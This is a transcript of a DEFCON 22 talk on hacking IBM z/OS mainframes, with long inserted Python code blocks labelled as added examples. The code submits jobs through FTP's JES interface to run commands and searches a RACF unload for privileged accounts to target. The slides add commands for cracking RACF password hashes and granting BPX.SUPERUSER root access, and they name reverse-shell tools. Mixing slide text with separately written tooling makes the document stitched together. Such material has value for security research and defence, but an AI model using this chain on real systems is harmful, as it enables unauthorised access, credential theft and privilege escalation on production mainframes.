DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM
TRANSCRIPT
![Page 1: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/1.jpg)
From ROOT to SPECIAL
PWNING IBM Mainframes
Soldier of Fortran @mainframed767
DISCLAIMER!
All research was done on personal time. I am not here in the name of, or on behalf of, my employer.
Any views expressed in this talk are my own and not those of my employer.
This talk discusses work performed in my spare time generally screwing around with mainframes and thinking 'what if this still works...'
PCI Security Expert
Mainframe Security Guru
ISO 27002 & PCI Certifier
“What’s NETSTAT?”
- Our Horrible Consultant
Spoken
?Question?
INTERNET MAINFRAMES (chart): PLAIN TXT 53%, SSL 47%
z/OS? WTF
• Most popular “mainframe” OS
• Version 2.1 out now!
Legacy my ass!
z/OS Demo
• Let’s take a look at this thing
• It’ll all make sense
Ettercap Demo
Missed it
CGI-Bin in tyool 2014
• REXX / SH still used
• Injection simple, if you know TSO commands
[CENSORED]
Only FTP?
• No problem! FTP lets you submit JCL (JCL = Job Control Language, roughly a batch script)
• Command: SITE FILE=JES (switches the session to the JES interface; a PUT after that submits the file as a job instead of storing it)
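What "FTP lets you run JCL" looks like end to end, as an added example (this is not the TShocker/MainTP code from the talk). It uses only the standard-library ftplib: switch the session into JES mode with SITE FILE=JES, PUT a TSO batch job, parse the job id out of the reply, then RETR the spool output. The host and credentials are placeholders, and the "It is known to JES as JOBnnnnn" reply wording the job id is parsed from is an assumption about the z/OS FTP server. The payload is an IKJEFT01 job that runs whatever TSO commands you hand it (LISTUSER here); the same job could carry the RACF PERMIT and SETROPTS commands shown later in the deck.

```python
"""Submit a TSO batch job over the z/OS FTP JES interface and fetch its output.

Added example, not the TShocker/MainTP code from the talk. Uses only the
standard-library ftplib. Host and credentials are placeholders; the job id
is parsed from the "It is known to JES as JOBnnnnn" reply, which is an
assumption about the z/OS FTP server's reply wording.
"""
import io
import re
from ftplib import FTP

# Assumed reply wording from the z/OS FTP server after a PUT in JES mode.
JOBID_RE = re.compile(r"known to JES as (JOB\d+)", re.IGNORECASE)


def build_tso_job(jobname: str, tso_commands: list, account: str = "ACCT") -> str:
    """Build JCL that runs TSO commands in batch via IKJEFT01 (the TSO TMP).

    Commands go in SYSTSIN; their output goes to SYSTSPRT, which is routed
    to the JES spool (SYSOUT=*) so it can be pulled back over FTP.
    JCL and in-stream data are limited to 72 significant columns.
    """
    for cmd in tso_commands:
        if len(cmd) > 72:
            raise ValueError(f"TSO command exceeds 72 columns: {cmd!r}")
    lines = [
        f"//{jobname[:8].upper():<8} JOB ({account}),'TSO BATCH',CLASS=A,MSGCLASS=H",
        "//TSO      EXEC PGM=IKJEFT01",
        "//SYSTSPRT DD SYSOUT=*",
        "//SYSTSIN  DD *",
        *tso_commands,
        "/*",
        "//",
    ]
    return "\n".join(lines) + "\n"


def submit_job(ftp, jcl: str, remote_name: str = "JOB.JCL") -> str:
    """Put the session in JES mode (SITE FILE=JES) and submit the JCL.

    `ftp` is a logged-in ftplib.FTP or anything with the same
    sendcmd/storlines interface. ASCII mode means the server converts the
    JCL to EBCDIC for us. Returns the JES job id from the server reply.
    """
    ftp.sendcmd("SITE FILE=JES")
    reply = ftp.storlines(f"STOR {remote_name}", io.BytesIO(jcl.encode("ascii")))
    match = JOBID_RE.search(reply)
    if not match:
        raise RuntimeError(f"no JES job id in reply: {reply!r}")
    return match.group(1).upper()


def fetch_output(ftp, jobid: str) -> str:
    """Retrieve a finished job's spool output (RETR <jobid> in JES mode)."""
    lines = []
    ftp.retrlines(f"RETR {jobid}", lines.append)
    return "\n".join(lines)


if __name__ == "__main__":
    # Placeholder target; only run against systems you are authorised to test.
    ftp = FTP("mainframe.example.com")
    ftp.login("FTPSCRPT", "password")
    job = build_tso_job("SOFJOB", ["LISTUSER", "LU FTPSCRPT"])
    jobid = submit_job(ftp, job)
    print("submitted as", jobid)
    print(fetch_output(ftp, jobid))
    ftp.quit()
```

The RETR only returns output once the job has finished; in practice you poll a LIST in JES mode until the job shows as OUTPUT before fetching, and the job id format (number of digits) varies by JES level, so the regex is deliberately loose.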
Access Granted
• Now we have access
• FTP Script Account
• Ettercap
Now what?
Escalate!
• Let’s escalate our privilege
• Connect with telnet/ssh/3270
• Use local priv escalation
Getroot.rx
• REXX script
• Leverages CVE-2012-5951: "Unspecified vulnerability in IBM Tivoli NetView 1.4, 5.1 through 5.4, and 6.1 on z/OS allows local users to gain privileges by leveraging access to the normal Unix System Services (USS) security level."
Tsk tsk
• IBM not really being honest here
• Works on any setuid REXX script!
DEMO
THANKS
• Swedish Black Hat community
• Oliver Lavery – GDS Security
• Logica Breach Investigation Files
Keep ACCESS
• Get a copy of the RACF database
• Crack its password hashes offline with John the Ripper (racf2john writes the hashes to stdout):
racf2john racf.db > racf_hashes
john racf_hashes
Steal
• Use IRRDBU00 (the RACF database unload utility) to dump the RACF database to a flat file
• Search the unload for accounts with the SPECIAL attribute
• Log in with a SPECIAL account
IRRDBU00
[CENSORED]
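The "search for SPECIAL accounts" step over an IRRDBU00 unload, as an added example (this is not the speaker's tooling). It reads the User Basic Data record (type 0200) for the SPECIAL, OPERATIONS, AUDITOR and REVOKE flags and the User OMVS Data record (type 02A0) for the UID, so it also surfaces the UID 0 accounts the next slides are about. Column positions follow IBM's published IRRDBU00 record layouts; check them against the RACF Macros and Interfaces manual for your z/OS release before trusting the output. It assumes the unload was transferred off the host in ASCII (text) mode, and the sample records at the bottom are constructed, not real data.

```python
"""Find privileged users in an IRRDBU00 unload of the RACF database.

Added example; not the speaker's tooling. Column positions follow IBM's
published IRRDBU00 record layouts for the User Basic Data record (0200)
and the User OMVS Data record (02A0); check them against the RACF Macros
and Interfaces manual for your release before trusting the output.
Assumes the unload was pulled off the host in ASCII (text) mode so it is
plain text here. The records at the bottom are constructed sample data.
"""
from __future__ import annotations

import sys
from dataclasses import dataclass


def col(line: str, start: int, end: int) -> str:
    """Return columns start..end (1-based, inclusive, as in the manual)."""
    return line[start - 1:end].strip()


@dataclass
class RacfUser:
    name: str
    special: bool = False     # USBD_SPECIAL: full authority over RACF profiles
    operations: bool = False  # USBD_OPER: bypasses most dataset access checks
    auditor: bool = False     # USBD_AUDITOR
    revoked: bool = False     # USBD_REVOKE
    uid: int | None = None    # USOMVS_UID from the OMVS segment (0 = root in USS)

    @property
    def interesting(self) -> bool:
        return self.special or self.operations or self.auditor or self.uid == 0

    def tags(self) -> list[str]:
        flags = [("SPECIAL", self.special), ("OPERATIONS", self.operations),
                 ("AUDITOR", self.auditor), ("UID0", self.uid == 0),
                 ("REVOKED", self.revoked)]
        return [name for name, on in flags if on]


def parse_unload(lines) -> dict[str, RacfUser]:
    """Merge 0200 (basic) and 02A0 (OMVS) records into one object per userid."""
    users: dict[str, RacfUser] = {}
    for line in lines:
        rtype = col(line, 1, 4)
        if rtype not in ("0200", "02A0"):
            continue  # group, dataset, general-resource records are not needed here
        name = col(line, 6, 13)
        user = users.setdefault(name, RacfUser(name))
        if rtype == "0200":
            user.special = col(line, 40, 43) == "YES"
            user.operations = col(line, 45, 48) == "YES"
            user.revoked = col(line, 50, 53) == "YES"
            user.auditor = col(line, 386, 389) == "YES"
        else:
            uid_text = col(line, 15, 24)
            if uid_text.isdigit():
                user.uid = int(uid_text)
    return users


def privileged_users(lines) -> list[RacfUser]:
    """Users worth targeting: SPECIAL, OPERATIONS, AUDITOR or UID 0."""
    return sorted((u for u in parse_unload(lines).values() if u.interesting),
                  key=lambda u: u.name)


def _record(fields: dict[int, str], length: int) -> str:
    """Lay text out at 1-based start columns in a blank record (sample data only)."""
    rec = [" "] * length
    for start, text in fields.items():
        rec[start - 1:start - 1 + len(text)] = list(text)
    return "".join(rec)


def make_0200(name, special="NO", oper="NO", revoke="NO", auditor="NO") -> str:
    return _record({1: "0200", 6: f"{name:<8}", 40: f"{special:<4}", 45: f"{oper:<4}",
                    50: f"{revoke:<4}", 386: f"{auditor:<4}"}, 480)


def make_02a0(name, uid: int) -> str:
    return _record({1: "02A0", 6: f"{name:<8}", 15: f"{uid:<10}"}, 30)


# Constructed sample unload (not real data).
SAMPLE_UNLOAD = [
    make_0200("IBMUSER", special="YES", oper="YES", auditor="YES"),
    make_0200("OPSADM", oper="YES", revoke="YES"),
    make_0200("FTPSCRPT"),
    make_0200("WEBSRV"),
    make_02a0("IBMUSER", 0),
    make_02a0("FTPSCRPT", 4711),
    make_02a0("WEBSRV", 0),  # UID 0 without SPECIAL: still root in USS
]


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="ascii", errors="replace") as fh:
            hits = privileged_users(fh)
    else:
        hits = privileged_users(SAMPLE_UNLOAD)
    for u in hits:
        print(f"{u.name:<8} {' '.join(u.tags())}")
```

Run it with the path to the unload as the only argument; with no argument it prints the hits from the constructed sample. Revoked SPECIAL accounts are still listed (with a REVOKED tag) because a SPECIAL user can simply RESUME them.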
Welcome to OWN zone
• SPECIAL is the RACF attribute that gives full authority over RACF profiles, so you can change anything about any user
• Add users
• Make other users SPECIAL or OPERATIONS
Give'r UID 0
Give'r SPECIAL
BPX. Wha?
• BPX.SUPERUSER is a profile in the FACILITY class: READ access to it lets a user su to UID 0 (root) in USS without a password
BPX.SUPERUSER
• As a SPECIAL user, type (replace USERID with the target user):
PERMIT BPX.SUPERUSER CLASS(FACILITY) ID(USERID) ACCESS(READ)
• Then refresh so the change takes effect:
SETROPTS GENERIC(FACILITY) REFRESH
• If the FACILITY class is RACLISTed (the usual setup where BPX.SUPERUSER is in use), the in-storage copy also needs SETROPTS RACLIST(FACILITY) REFRESH before the new access is honoured
Tools
• CATSO – TSO Bind/Reverse shell
• TSHOCKER – Python/JCL/FTP wrapper for CATSO
• MainTP – Python/JCL/FTP getroot.rx wrapper
TShocker
Maintp
• Uses GETROOT.rx + JCL and FTP and NetEBCDICat to get a remote root shell
I want one
• RDz – Rational Developer for System z
• We can use it to practice instead
• Call your IBM rep!
Thanks
• Dominic White (@singe)
• The community
• IBM
Contact
Twitter: @mainframed767
Email:
Websites:
Mainframed767.tumblr.com
Soldieroffortran.org